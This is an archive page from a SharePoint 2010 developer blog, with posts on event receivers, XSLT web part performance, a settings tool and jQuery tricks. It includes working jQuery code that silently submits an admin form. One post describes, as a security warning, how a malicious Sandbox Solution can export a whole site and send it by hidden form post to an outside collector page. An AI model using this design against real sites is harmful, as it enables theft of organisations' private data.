Jaap Vossers' SharePoint Blog

Just another WordPress.com site

Archive for the ‘SharePoint 2010’ Category

SharePoint Asynchronous Event Receivers and the powershell.exe process

with 5 comments

We recently had a very strange problem with one of our custom Event Receivers in our production SharePoint environment. The Event Receiver implemented the Asynchronous ItemUpdated event. It was used to generate and set a value on one of our fields on the document being updated. The code in the Event Receiver appeared to work most of the times, but would fail at seemingly random occasions and would leave the updated document without the generated field set.

We were struggling to isolate the combination of factors that made it fail. The weirdest thing was that there were no errors to be found in the ULS logs or the Event Log. We added lots of logging and try/catch blocks, but for some reason when the Event Receiver failed it would never enter the catch block, so there was no exception to log.

One key point that helped us with the troubleshooting was that we had noticed that the Event Receiver ALWAYS worked when the document was being updated through the SharePoint web UI. We also had a PowerShell script which was used for bulk updating of documents. This script was scheduled to run at regular intervals using Windows Task Scheduler. It appeared that the issue only occurred when the Updated event was triggered via this scheduled PowerShell script, but even then it still seemed intermittent as it would often work just fine.

We were unable to reproduce the issue at all when calling the ps1 file directly from the PowerShell console. So what was different when the script was run from the Task Scheduler vs directly from the PowerShell console? Well, the Task Scheduler actually calls a BATCH script which in turn invokes the PowerShell script which fires up a new PowerShell process. This process dies when it finishes execution of the ps1 file!

Remember, our Event Receiver is an Asynchronous one, so it would not block the execution of the PowerShell script. The Event Receiver is actually executed on a thread inside the PowerShell process since the ps1 script triggered the Updated event. So, when the PowerShell.exe process dies, it does not seem to wait for any background threads to complete, which in our case causes our Event Receiver to suffer from a sudden death. I was a bit surprised to see this to be honest!

Anyway, I guess one of the reasons why in our case the problem seemed to be appearing randomly is that only the last document in a batch would be affected, which sometimes meant 1 in a couple thousand documents. Only recently users had started feeding the script with “batches” consisting of just one document, which is what highlighted the problem to us and lead to this investigation. We were wondering what had changed recently (we had not touched this part of the code for a while!), since it was all working fine before (we thought), but in reality the bug had always been there but it had never occurred to us!

So everyone please beware when invoking PowerShell scripts from BATCH scripts when you have Asynchronous Event Receivers in your SharePoint environment!

What did we do to work around our problem? We just put a little Sleep at the end of our PowerShell script… 🙂

Written by jvossers

February 3, 2014 at 10:10 pm

Using jQuery to submit forms on remote SharePoint admin pages

with one comment

Imagine you need to develop a piece of functionality to extend SharePoint, but the available APIs do not directly allow you to do this for any of the following reasons:

  1. You are not allowed to deploy any server side code
  2. The server side code you can deploy has limited access to the server object model (e.g. Sandbox Solutions in SharePoint 2010).
  3. The API you need to access is private or internal

Consider the following scenario.

For our SharePoint Online site, we want to implement a Web Part that allows us to save the current site as a WSP in the solution gallery. As it’s SharePoint Online, we can’t deploy Farm Solutions, so we will have to deploy it as a Sandbox Solution. Unfortunately, we have limited access to the Object Model on the server, and there is nothing available in the Client Object Model which we can use to save the current site as a template.

Now, if there is an existing administration page that does what we want to do (in our case /_layouts/savetmpl.aspx does what we want to do), then technically all we need to do is a submit an HTTP POST request to that page with the right HTTP headers and form parameters and the server will happily process the request, as it has no way of telling whether the request was triggered by a user submitting the form, or by something else.

Welcome to the world of stateless protocols.

So we need to find out what the request should look like so that we can use jQuery to build it and issue it as an AJAX request from our own code.

image

Let’s open up Fiddler. With Fiddler open, in the browser we press the button that submits the form on /_layouts/savetmpl.aspx,. After that, we can inspect the form parameters of the HTTP POST request that the browser then makes. We are not really interested in the HTTP headers as the browser will take care of passing any headers related to the current browser session (including the authorization header) to the server when we issue an AJAX request.

image

We have three main categories of form parameters.

The first category is made up of parameters that directly map to user input fields.

  • ctl00$PlaceHolderMain$ctl00$ctl00$TxtSaveAsTemplateName
  • ctl00$PlaceHolderMain$ctl01$ctl00$TxtSaveAsTemplateTitle
  • ctl00$PlaceHolderMain$ctl01$ctl01$TxtSaveAsTemplateDescription
  • ctl00$PlaceHolderMain$ctl03$CbSaveData

The second category consists of a set of hidden fields which are used by ASP.NET & SharePoint to do its postback magic, including validation of the form post.

  • __REQUESTDIGEST
  • __VIEWSTATE
  • __EVENTVALIDATION

The third category is “the rest”. This is stuff we are not really interested in, but we still need to send it to the server.

  • MSOWebPartPage_PostbackSource
  • MSOTlPn_SelectedWpId
  • MSOTlPn_View
  • MSOTlPn_ShowSettings
  • MSOGallery_SelectedLibrary
  • MSOGallery_FilterString
  • MSOTlPn_Button
  • MSOSPWebPartManager_DisplayModeName
  • MSOSPWebPartManager_ExitingDesignMode
  • MSOWebPartPage_Shared
  • MSOLayout_LayoutChanges
  • MSOLayout_InDesignMode
  • MSOSPWebPartManager_OldDisplayModeName
  • MSOSPWebPartManager_StartWebPartEditingName
  • MSOSPWebPartManager_EndWebPartEditing
  • _maintainWorkspaceScrollPosition
  • __spText1
  • __spText2

It’s easy to determine what we want to submit as values for the first category. We either capture these values in our custom UI, or we have some logic in our code that determines these values for us.

The second category is a bit more difficult. Essentially, the server is expecting us to post back these values, which were provided by the server and rendered on the page as hidden input fields at the time of requesting the page which has the form on it. This means we need to make an initial GET request using jQuery so we can extract the values from the form, before we can submit them in our post.

The third category is easy, as we can copy the values from the request we captured with fiddler.

The script

Following the instruction above, we can write a bit of javascript like this to allow us to submit forms on “remote” pages.

function CreateWSP(callback) {

    var sitePrefix = "/";

    if (_spPageContextInfo.siteServerRelativeUrl != "/") {
        sitePrefix = _spPageContextInfo.siteServerRelativeUrl + "/";
    }

    var url = sitePrefix + "_layouts/savetmpl.aspx";

    $.get(url, function (data, textStatus, XMLHttpRequest) {

        var ctx = $(data);

        var rd = ctx.find("[name='__REQUESTDIGEST']").val();
        var vs = ctx.find("[name='__VIEWSTATE']").val();
        var ev = ctx.find("[name='__EVENTVALIDATION']").val();

        var postParams = {
            "MSOWebPartPage_PostbackSource": "",
            "MSOTlPn_SelectedWpId": "",
            "MSOTlPn_View": "0",
            "MSOTlPn_ShowSettings": "False",
            "MSOGallery_SelectedLibrary": "",
            "MSOGallery_FilterString": "",
            "MSOTlPn_Button": "none",
            "MSOSPWebPartManager_DisplayModeName": "Browse",
            "MSOSPWebPartManager_ExitingDesignMode": "false",
            "__EVENTTARGET": "ctl00$PlaceHolderMain$ctl02$RptControls$BtnSaveAsTemplate",
            "__EVENTARGUMENT": "",
            "MSOWebPartPage_Shared": "",
            "MSOLayout_LayoutChanges": "",
            "MSOLayout_InDesignMode": "",
            "MSOSPWebPartManager_OldDisplayModeName": "Browse",
            "MSOSPWebPartManager_StartWebPartEditingName": "false",
            "MSOSPWebPartManager_EndWebPartEditing": "false",
            "_maintainWorkspaceScrollPosition": "0",
            "__REQUESTDIGEST": rd,
            "__VIEWSTATE": vs,
            "__SCROLLPOSITIONX": "0",
            "__SCROLLPOSITIONY": "0",
            "__EVENTVALIDATION": ev,
            "ctl00$PlaceHolderMain$ctl00$ctl00$TxtSaveAsTemplateName": "VossersTeamSite.wsp",
            "ctl00$PlaceHolderMain$ctl01$ctl00$TxtSaveAsTemplateTitle": "Vossers Team Site",
            "ctl00$PlaceHolderMain$ctl01$ctl01$TxtSaveAsTemplateDescription": "Vossers Team Site Template",
            "ctl00$PlaceHolderMain$ctl03$CbSaveData": "on",
            "__spText1": "",
            "__spText2": ""
        };

        var options = {
            url: url,
            type: "POST",
            data: postParams,
            success: function (data, textStatus, XMLHttpRequest) {

                callback();

            }
        };

        $.ajax(options);

    }, "html");
}

Things to consider

When the page you are posting to is modified, for example by a SharePoint update, then it’s possible that your script breaks due to changes in form parameter names. This makes this technique a bit fragile. For this reason I recommend that you only consider using this technique once you have confirmed that it’s not possible to achieve what you want by using public APIs.

Written by jvossers

February 4, 2012 at 3:22 pm

How the XsltListViewWebPart in SharePoint 2010 can be a real performance killer

with 32 comments

This article describes how the out-of-the-box XsltListViewWebPart, XLV in short, can cause performance problems, sometimes up to the point where pages being served to users are hitting the ASP.NET execution timeout (110 seconds by default).

The XLV is a Web Part that was introduced in SharePoint 2010 as the replacement for the ListViewWebPart. The most important feature of the XLV is the ability to use a custom XSLT style sheet to customise the rendering of the list data surfaced through the XLV. On the project I am currently working we are making extensive use of this technique. What turns out is that this has been the main cause of the – seemingly random – performance problems we have been experiencing on our production environment for the last couple of months. On one day, it completely got out of hand and for the majority of the working day, our 3000 users were getting request timeouts and were simply unable to load most the pages in our portal. As a result, with support from a few colleagues, I have spent about 2 weeks trying to get to the bottom of this problem, which involved extensive analysis of the ULS logs, IIS logs, Content Database, Performance Counters and a lot of Reflected SharePoint code. By the end, I had come up with a set of steps to reproduce the problem on a vanilla SharePoint environment. I had gotten a better understanding of the internal workings of the XLV; enough to explain why it’s doing what it does. Keep on reading if you are interested in finding out more. Warning, this article contains code.

So – what are the ingredients?

  1. a SharePoint 2010 Publishing Site
  2. One or more XsltListViewWebParts with the XslLink property set to point to an XSLT file
  3. Multiple Web Front End servers

What are the symptoms?

  • A variable increase in response times for pages with XLVs using XslLink; sometimes hardly noticeable, sometimes so bad that the request will time out.

Why? What? How?

In short, the problem is related to this thing called XSLT compilation which happens on the Web Front Ends at runtime. There seems to be a bug in the XLV that’s causing it to discard the compiled XSLT from its cache when it should be keeping it.

Compilation of XSLT is quite an expensive operation, which is why the XLV is meant to be caching the result so that the XSLT doesn’t have to be recompiled for every subsequent request. The time it takes to compile an XSLT style sheet seems to be dependent on its contents. Compilation of style sheets with more content seem to take longer than compiling small ones. On our environment, we’ve got fairly large XSLT stylesheets and it’s not uncommon for a single compilation to take 2 seconds.

Why is it a problem if the Web Frond End servers are busy compiling XSLT style sheets all the time? Have a look at the following reflected code (obtained using ILSpy, an open-source alternative to .NET Reflector),

image

The developers amongst you will understand that the call to AppDomainHelper.DoSerialize() is wrapped in a lock, meaning that XSLT compilation is something that can only be done by one thread at a time.

This funnel becomes a massive bottleneck when compilation cannot keep up with the compilation requests coming in, as they will form a growing queue of threads blocked at Monitor.Enter(). As the queue of blocked threads keeps growing, the amount of time that each individual thread has to wait goes up. Imagine for a moment what this will do to page response times.

Not to mention that the compilation of XSLT is actually being performed in a separate AppDomain, whose lifetime is managed by SharePoint. For some reason, if this AppDomain has served a total of 100 compilation requests, SharePoint decides to unload the AppDomain and create a new one. This is also an expensive operation and gives the queue of blocked threads the opportunity to grow even more.

image

To back up this theory, have a look at the following SCOM chart, which presents the “Total appdomains unloaded” performance counter for each of our Web Front End servers over a period of 24 hours. The counter gets reset after an Application Pool recycle, hence the drops after midnight.

image

It shows that it’s quite likely that our Web Front End servers are busy compiling XSLT all the time, causing and increase in response times for all requests to pages containing an XLV with XslLink set.

Let’s go back to our scenario where we experienced those severe performance issues for a whole day. The queue of threads waiting for the lock to be released had grown so much that we had threads waiting long enough for ASP.NET to decide it was time for it throw its virtual towel in the ring for that request. When the ASP.NET execution timeout is hit, ASP.NET it will throw a ThreadAbortException on the thread that is handling the request.

The picture below is showing a filtered set of entries from a ULS log file which contains 12 minutes worth of logs at Verbose level from a single Web Front End, captured during this period when we were experiencing our severe performance problems. The definition of the filter that is applied is Where [Message] Contains “Monitor.Enter”.

image

476 timeouts in 12 minutes, that’s about 40 per minute.

The nice thing about these entries in the ULS logs is that we can tell which method the thread was executing when the ThreadAbortException was thrown by ASP.NET because they contain a Stack Trace, and as you can see in the screenshot above, these threads were all “executing” Monitor.Enter(), i.e. they were blocked, waiting for the lock to be released.

Why are the XLVs compiling the XSLT all the time? Isn’t it supposed to cache the result and reuse it? You’d think so. Let’s have a good look at the Stack Trace that we’ve got that leads to the call to Monitor.Enter() as I am pretty sure that somewhere in the call stack a decision was made that it should not use a cached version of the compiled XSLT.

Error while executing web part: System.Threading.ThreadAbortException: Thread was being aborted.
at System.Threading.Monitor.Enter(Object obj)
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.GenerateCustomizedXsl(BaseXsltInfo baseXsltInfo)
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.get_CustomizedXsl()
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.LoadXslCompiledTransform(WSSXmlUrlResolver someXmlResolver)
at Microsoft.SharePoint.WebPartPages.DataFormWebPart.GetXslCompiledTransform()
at Microsoft.SharePoint.WebPartPages.DataFormWebPart.PrepareAndPerformTransform(Boolean bDeferExecuteTransform)

Note that the XsltListViewWebPart derives from BaseXsltListWebPart which in turn derives from DataFormWebPart.

DataFormWebPart.GetXslCompiledTransform() contains logic which decides whether BaseXsltListWebPart.LoadXslCompiledTransform() should be called or not. It only calls this method if it was unable to retrieve the compiled XSLT from its cache. Note that the DataFormWebPart uses HttpContext.Current.Cache as its “first level” of caching for the compiled XSLT (I will explain later why I call it “first level”).

So by the looks of it, the XLV was consistently unable to retrieve any compiled XSLT from the HttpContext.Current.Cache? Did it fail to add it to the cache the last time it compiled the XSLT, or has it perhaps been removed from the cache since it’s been added?

Let ‘s have another look at the same ULS file we looked at earlier. We’ve got the following suspicious entries. The definition of the filter that is applied is Where [Message] Contains “InvalidateAll”.

image

Not a very descriptive message you’d say, but descriptive enough to suspect it might be clearing some kind of cache for whatever reason.

ILSpy agrees.

image

What is the MemoryPartCache class? And what is it removing from the cache exactly?

The Microsoft.SharePoint.WebPartPages.WebPart class exposes the protected methods PartCacheRead() and PartCacheWrite() which internally use an object that derives from the abstract Microsoft.SharePoint.WebPartPages.PartCache class. Depending on what’s configured in the web.config, either an instance of MemoryPartCache of DatabasePartCache will be used. With the default web.config for SharePoint, an instance of MemoryPartCache will be used.

image

Let’s drill down into the constructor of MemoryPartCache.

image

Two things are interesting here. First of all, the call to BuildDependsKeys() as it looks like inside it is building the value for this.dependStringKey, which is the key for the object that is being removed in the InvalidateAll() method which we looked at earlier. Let’s have a look at that first, before we have a look at what the EnsureDependsKeyValid() method does.

image

Assuming the Web Part for which this MemoryPartCache object is being created has a StorageKey (Web Part ID), it will build a string with two “dynamic” elements; the Storage Key and the id of the SPSite. This implies there is a one-to-one relationship between an instance of Microsoft.SharePoint.WebPartPages.WebPart and such a key. Let’s remember this and find out where else this key is being used.

image

Before we have a look at EnsureDependsKeyValid(), let’s look at the Add() method. The MemoryPartCache.Add() is called when PartCacheWrite() is called on Microsoft.SharePoint.WebPartPages.WebPart. Whatever object needs to be added to the cache will be passed into MemoryPartCache.Add() as a method parameter named “data”. On line 59, at the very bottom of the bit of code below, you can see that the “data” object is being added to the cache. But hold on, it is being added with a CacheDependency! The CacheDependency that is being passed in is based on a string array, which means that it establishes a dependency on other object(s) in the cache, with the array items representing the key(s) of the “master” item(s). In this case we are only dependent on a single “master” item. This “master” item itself is added to the cache on line 30, if it didn’t already exist (which is tested on line 24). The interesting bit here is that the “master” item’s key is in fact this.dependentStringKey, which means that whenever MemoryPartCache.InvalidateAll() is called for a Web Part, its “master” item will be removed from the cache, along with any other “child” items that have been added through MemoryPartCache.Add().

image

We had already proven that InvalidateAll() is getting called quite a bit, so it’s possible that other cached objects are being removed from the cache as a result of that.

Let’s have a look at MemoryPartCache.EnsureDependsKeyValid(), which is also being called from within the MemoryPartCache constructor.

image

We are getting closer. So in certain circumstances, InvalidateAll() will be called, which essentially does what pretty much what it says it does; remove the master item from the cache along with any other objects in the cache related to this particular Web Part. What exactly is it testing in the if statement on line 6? It is comparing the result of the call to this.GetDepencyKeyHash() to the value of the cached “master” item, which, at the time of adding, also held the return value of a call to this.GetDepencyKeyHash(), as can be seen in line 30 in MemoryPartCache.Add(), above.

Let’s have a look at what GetDepencyKeyHash() does.

image

Aha! It looks at the Web Part version.

In a nutshell this means that whenever a web part version changes, any cache stored against other (previous) versions of that web part, will be cleared.

The version of a Web Part is not exposed through a public API, so if you want to see it you need to either write code which uses reflection to read the internal Version property of Microsoft.SharePoint.WebPartPages.WebPart, or you can have a quick peek in the Content Database. Note that you should never touch the Content Database on a production environment, which is why you should back up the database and restore it elsewhere before you start running queries against it.

As I was exploring the Content Database, I spotted the tp_Version column on the AllWebParts table. When I selected all rows from the AllWebParts table, and ordered it by tp_Version in descending order, I found that some of our web parts had versions greater than 100.000, which is pretty suspicious I must say!

Let’s summarise what information we’ve got so far.

  1. Web Part versions are incrementing A LOT for some unknown reason
  2. Objects stored in Web Part Cache are being cleared every time a Web Part version changes
  3. XLVs seem to be unable to retrieve compiled XSLT from the cache, with recompilation of the XSLT as a result, causing a variable increase in response times

Even though the compiled XSLT itself is not stored using Web Part Cache, another object of type CloneableHashtable is. This object is added and retrieved from the Web Part Cache to facilitate the retrieval of the compiled XSLT by taking part in process of building the cache key required to retrieve the compiled XSLT. This means that when InvalidateAll() is called and the Web Parts’s “master” object will be removed from the cache, so will this CloneableHashtable as it’s dependent on the Web Part’s “master” object. As a result, the XLV cannot retrieve the CloneableHashtable from the cache (as it does not exist anymore), and consequently it cannot build the cache key that is required to retrieve the compiled XSLT from the cache. This logic is defined in Microsoft.SharePoint.WebPartPages.DataFormWebPart.GetXslCompiledTransform().

Why are the Web Part versions being incremented automagically?

Remember I mentioned “first level” of caching earlier? Well, there is a second level of caching of the compiled XSLT, in the content database, in the tp_Cache column in the same AllWebParts table. How I understand how this is SUPPOSED to work, is that if you have multiple Web Front End servers, and the first server to serve a page with a new XLV with XslLink on it does the compilation, it will first add the compilation result to its own cache as described above, and then it will also save it to the database (line 32, below), so that all the other Web Front End servers in the farm can reuse it.

Pretty clever.

Too bad it doesn’t work.

image

The call to CacheWriteInternal on line 32 results in a call to a Stored Procedure called proc_UpdateWebPartCache. However, the value passed in to the VarBinary @Cache parameter of the Stored Procedure does not contain any data, as can be observed in the Developer Dashboard.

image

Also, If you run a trace with SQL Server Profiler whilst CacheWriteInternal() is being called you can see the call to proc_UpdateWebPartCache, and you can see that a NULL value was passed as the value for the @Cache parameter.

To confirm the database really didn’t receive the compilation result, we can run a select query on the AllWebParts table. It shows only NULL values in the tp_Cache column. Essentially, it’s not saving the compiled XSLT to the database properly.

What it did do, just before it called CacheWriteInternal(), was that it made a call to SaveChanges() on line 31. And guess what that does. It calls a Stored Procedure called proc_UpdateWebPart, and one of the many things this Stored Procedure does is incrementing the Web Part version!

image

What would have happened if the compiled XSLT would have been saved to the database successfully?

Lets have a look at the definition of PartCacheUpdate() which is being overridden in the Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart class, the base class for the XLV.

image

Now the name of this method is a bit confusing, but what it really is, is a mechanism to allow to the WebPartManager to “inject” the value of the tp_Cache column from the AllWebParts table into the Web Part that owns the cache at the time of instantiating the Web Part as a Control on the page, somewhere fairly early on in the page lifecycle. So IF the tp_Cache column would have a held a value other than null, we would have captured it in the this._customizedXsl field, line 7.

Now let’s go back to a bit of code we looked at just a moment ago.

image

Notice the if statement on line 9, where it tests if this._customizedXsl is null. Assuming we had received it from the database via the WebPartManager, there would have been no call to this.GenerateCustomizedXsl() and we would have successfully reused the compilation result from another Web Front End server.

There is however a caveat. Even if we did receive the compiled XSLT from the database, there is a “second chance” to recompile when the if statement on line 18 is satisfied. The BaseXsltHashKey property on the XLV holds a string containing a list of filenames of .xsl files that live in the TEMPLATE\LAYOUTS\XSL folder and their last modified times. The if statement on line 18 tests if the value stored in the Web Part is the same as the one it just calculated by checking the files on the file system of Web Front End serving the current request. If they are different, SharePoint thinks you just deployed a new .xsl file and it’s time to recompile.

What this means is, if, for some reason, the list of .xsl files contained in the TEMPLATE\LAYOUTS\XSL and their last modified times are not exactly the same across all Web Front End servers, you will have a problem. Because, SharePoint will keep detecting a difference between the value stored in the Web Part property and the calculated values, as the Web Part property keeps getting updated with the calculated value from the Web Front End server that last detected the difference, and the never ending ping pong game has started.

We have seen scenarios where standard WSP deployment of .xsl files into the TEMPLATE\LAYOUTS\XSL folder sometimes caused files to be deployed / updated with timestamps that we not exactly the same across all Web Front End servers in the farm, i.e. a difference of a single second. This is enough SharePoint to start playing the never ending ping pong game. I must say that I have not seen this kind of odd behaviour with WSP deployments before, so I am not sure if this is something environmental or something that affects everyone.

Overview

For a quick overview of the overall flow which is described in this article please refer to the following a diagram.

xsl_compilation_01

The main question

Why does the call to CacheWriteInternal() result in a Stored Procedure call with a NULL value for the @Cache parameter? I would love to know.

What’s next?

I am planning to write a follow up blog post soon on this topic where I will describe a work around that has solved the problem for us. Some of our worst hit pages went from an average of 8 second response times to less than a second.

Also, I have been in touch with Microsoft, and they have been able to reproduce the issue on their end. I am waiting to hear back from them.

Thanks

I would like to thank my colleagues and mates Nick Mulder, Glyn Clough, Steve Kay, Andres Ramon, and Kristof Kowalski for their help and great ideas.

How to reproduce

For those wanting to reproduce the issue on their own environment, you can do so by following these steps.

  1. Create a hosts file entry to point to 127.0.0.1 for the hostname “xlv” on each Web Front End.
  2. Create a new Web Application using mostly default settings:
    1. Claims Mode
    2. New IIS website
      1. Port 80
      2. Hostname “xlv”
    3. New Content Database
  3. Create a new root Site Collection under new Web Application
    1. Template: Publishing Portal
  4. Edit /Pages/default.aspx
    1. Remove all existing web parts
    2. Add new Web Part to page
      1. Lists and Libraries > Pages
    3. Edit newly added Web Part
      1. Property: Miscellaneous > XSL Link
      2. Value: /_layouts/XSL/main.xsl
    4. Check-in and publish/Pages/default.aspx
  5. Turn on Developer Dashboard with TraceEnabled=True and click “Show or hide additional tracing information . . .” at the bottom of the page to show additional tracing information.
  6. Open an RDP session to two of the Web Front Ends (let’s call them WFE1 and WFE2)
  7. On WFE1, Request http://xlv/Pages/default.aspx
  8. On WFE2, Request http://xlv/Pages/default.aspx
  9. WFE1, Request http://xlv/Pages/default.aspx
    1. Confirm the text “InvalidateAll” appears on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
        1. Confirm that the “Size” of the @Cache parameter is 0
  10. On WFE1, refresh the page a number of times
    1. Confirm the text “InvalidateAll” does NOT appear on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries do NOT exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
  11. On WFE2, Request http://xlv/Pages/default.aspx
    1. Confirm the text “InvalidateAll” appears on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
        1. Confirm that the “Size” of the @Cache parameter is 0
  12. On WFE2, refresh the page a number of times
    1. Confirm the text “InvalidateAll” does NOT appear on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries do NOT exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
  13. Run the following SQL query on the Content Database for the xlv Web Application
    1. SELECT wp.* FROM AllWebParts wp INNER JOIN AllDocs doc ON wp.tp_PageUrlID = doc.Id WHERE doc.DirName = ‘Pages’ AND doc.LeafName = ‘default.aspx’ AND wp.tp_IsCurrentVersion = 1
    2. Confirm the value for the tp_Cache column of the only row returned is NULL
  14. Repeat step 9 to step 12 a number of times
    1. Rerun the query in step 13.1 and confirm the value for tp_Version is incremented by one every time you reload the page and “InvalidateAll” appears on the page in the additional tracing information.

Written by jvossers

January 28, 2012 at 12:53 pm

Posted in SharePoint 2010

SharePoint InlineSiteSettings 2010 – improved productivity for Administrators and Developers

leave a comment »

After having released SharePoint InlineSiteSettings for SharePoint 2007 a while ago, and having used a little desktop application called Launchy which is used to start desktop applications using just a few keystrokes, I decided to build an enhanced version of InlineSiteSettings, built for SharePoint 2010 with features similar to Launchy’s.

The end result is SharePoint InlineSiteSettings 2010, which can be downloaded from CodePlex at http://sitesettings2010.codeplex.com/

inlinesitesettings2010

The purpose of the solution is to improve productivity for SharePoint 2010 users who regularly access the Site Settings page, i.e. SharePoint Administrators and SharePoint Developers. It allows them to access the Site Settings in a dialog by pressing Ctrl+s, so no need to move your mouse to Site Actions, click it, click Site Settings, and wait for the full page to load.

As we all know, once the Site Settings page has been loaded, it can actually take a few seconds to spot the link you are looking for (as the links are not listed in alphabetical order), so what’s new in this version of SharePoint InlineSiteSettings is that users can start typing the title of the link they whish to navigate to, and with real-time filtering functionality, all links that do not match your filter will disappear from view. In addition to that, as soon as exactly one link is left that matches your filter, it will automatically redirect you to that page, as can be seen in the demo screencast below. As a result, navigating between administrative pages in SharePoint 2010 will be less painful.

SharePoint InlineSiteSettings 2010 is packaged as a Sandbox Solution, and does not depend on any server side code. The good thing about this is that it works on SharePoint Online (Office365).

Download SharePoint InlineSiteSettings 2010 from CodePlex

Written by jvossers

May 8, 2011 at 9:59 pm

Bypass caching with jQuery AJAX GET requests

with one comment

As I seem to use this trick quite often and I keep forgetting the exact details on how to implement it, I thought it would be good to document this.

Using jQuery, I often make ansynchronous GET requests to a custom ASHX handler in SharePoint’s _layouts folder which returns some data that I want to display. This data is always dynamic, but sometimes the browser tries to cache the results from the previous request, so you might not get the response you expected.

To avoid this, simply make the url for eacht request unique by adding a timestamp to it in javascript.

var url = '/_layouts/MyProject/MyHandler.ashx?unique=' + new Date().getTime();

Written by jvossers

January 11, 2011 at 10:41 am

Malicious Sandbox Solutions in SharePoint 2010 – my private data has been stolen!

with 4 comments

We all know about the existence of Sandbox Solutions in SharePoint 2010 and why you would want to use it. We also know that server side code running in the Sandbox is very restricted. Things like accessing the server’s file system, using the SPSite constructor, sending e-mails, making web requests, plus loads of other actions cannot be performed when running in the Sandbox for the sake of security.

It is easy to start thinking that Sandbox Solutions cannot do too much harm and that any damage done stays within the walls of the Site Collection. The aim of this blog post is to bust this myth and make people aware that they are still responsible for validating the contents of any Sandbox Solution they activate on their Site Collection.

What if I told you I have developed a Sandbox Solution that upon activation collects documents and list data from your site collection and sends it to me, the evil developer, outside your Site Collection walls? Would you be surprised to hear this is possible? I think many people would be.

It is possible.

  1. Evil Dev produces Malicious Sandbox Solution
  2. Site Collection Admin uploads and installs Malicious Sandbox Solution
  3. Malicious Sandbox Solution collects private data from Site Collection and sends its to Evil Dev

malsandbox

Now it’s time to see it in action.

For obvious reasons I will not post the full source code, but I am happy to explain how it works.

I am assuming all of the code runs under the context of a Site Collection Administrator.

Note that the following “solution” does NOT depend on the fact that it runs in a Sandbox. In fact, as Jan Tielens has kindly pointed out, the same result could be achieved with a JavaScript only solution.

Step 1 – Save site as a template through JavaScript in the background
Let’s leverage the “Save as Template” functionality as used in /_layouts/savetmpl.aspx to produce a WSP that contains the site with all its contents, including documents in document libraries and lists with data. The first hurdle we need to get past is to figure out how we are actually going to achieve this, since SPSolutionExporter.ExportWebToGallery() is not available in Sandbox Solutions. One way to hack around this is to use jQuery to perform an AJAX POST to /_layouts/savetmpl.aspx providing all the POST parameters that it expects. Remember, HTTP is stateless. We need to perform an initial AJAX GET to /_layouts/savetmpl.aspx to obtain the values of __REQUESTDIGEST, __VIEWSTATE and__EVENTVALIDATION so we can trick ASP.NET into thinking that the POST we are about to perform originates from a user looking at /_layouts/savetmpl.aspx in his browser. All the other post parameters that the page expects to receive as part of a POST can be obtained using Fiddler as we perform a manual form submit through the browser on /_layouts/savetmpl.aspx
All of our JavaScript code will run on a custom Web Part page that is loaded inside an iframe, except for the bit of JavaScript that is responsible for creating this iframe. This Web Part page plus the custom Web Part that lives on this page have been deployed to our Site Collection using Features that reside in our malicious Sandbox Solution. A Feature containing a CustomAction with Location=”ScriptLink” takes care of loading our JavaScript file on every page.
Once we have the JavaScript in place to initiate the creation of the template, we need to wait for the process to complete. Lucky for us, the /_layouts/savetmpl.aspx page blocks until it has finished producing the template, so we know that when the callback of our AJAX POST is called we are ready to rock. In the next step I will explain why it’s important for the script to be informed when the page has finished creating the template.

Step 2 – Get access to saved template data in JavaScript code
We have successfully managed to save the template in the Solution Gallery of the Site Collection. Now we need to access this file. I mean really access the file contents in JavaScript code. Unfortunately we can’t pass around binary data in JavaScript, so we need an alternative. Wouldn’t it be cool if we had access to a JavaScript string variable containing a base64 encoded string that represents the binary data of our freshly baked template? Yes, that would be very cool. The Web Part that lives on the Web Part page can do this for us. As part of the page lifecycle, the Web Part looks to see if the expected template file exists in the Solution Gallery (the Solution gallery is just an SPList and the template file we are looking for is just an SPFile). If the file exists, it gets the binary data of it, converts it to a base64 encoded string and renders a snippet of JavaScript that defines the string variable we are going to use in step 3. The first time the Web Part page was loaded inside the iframe the template did not exist in the Solution gallery, hence it did not render this JavaScript variable, which was also a hint to our JavaScript to initiate the creation of the template. Remember we said we have a callback in our script to notify us when /_layouts/savetmpl.aspx has completed producing our template? Excellent – because inside our callback we are going to force our iframe to refresh, causing the Web Part to output the base64 encoded string variable.

Step 3 – Send template data to a remote server
Now what we have our data available in JavaScript, how do we “send” this to the outside world? Perfoming AJAX calls to anything that is not on the same domain will be noticed or even blocked by the browser, so this is not an option. This is not true for regular form posts. All we need to do is create an html form, set its action attribute to point to a “collector page” somewhere on the internet. This page can then listen for incoming form posts and transform the posted base64 encoded string back to its binary representation and save it somewhere as an actual file. Your data has just been stolen…

To conclude
I don’t think there is anything technically wrong with the security model of Sandbox Solutions. The point I am trying to make with this blog post is that even though there is a lot of stuff that cannot be done from within a Sandbox Solution, there is still quite a lot of stuff that can be done -which can be seen as good or bad!

Do not blindly trust a Sandbox Solution. As Site Collection Administrators, we are still responsible when it comes to assessing and validating the trustworthiness of a Sandbox Solution and its source.

What about custom Solution Validators? You could use these to only allow certain pre-approved or signed Sandbox Solutions to be activated for example, but it comes at a price. You compromise on business agility in order to increase security. Kind of reminds me of Farm Solutions…

Written by jvossers

November 12, 2010 at 9:34 am

Per-Location View Settings in SharePoint 2010 (Views per Content Type)

with 9 comments

What’s that supposed to mean? That’s what went through my head when I saw a new link which had appeared on the List Settings page (listedit.aspx) in SharePoint 2010.

When I clicked the link, I was directed to a page where I could manage the available views per “location”.

The word “location” can have many different meanings. My initial thought was that it was referring to folders inside the list and that this page is used to configure which views are available per folder.

This turned out to be correct. I added a folder to the list and was able to make my custom view appear on there, whilst hiding it from the root of the list.

Is that all? Why call it locations when you mean folders? Well, because it does not only apply to folders!

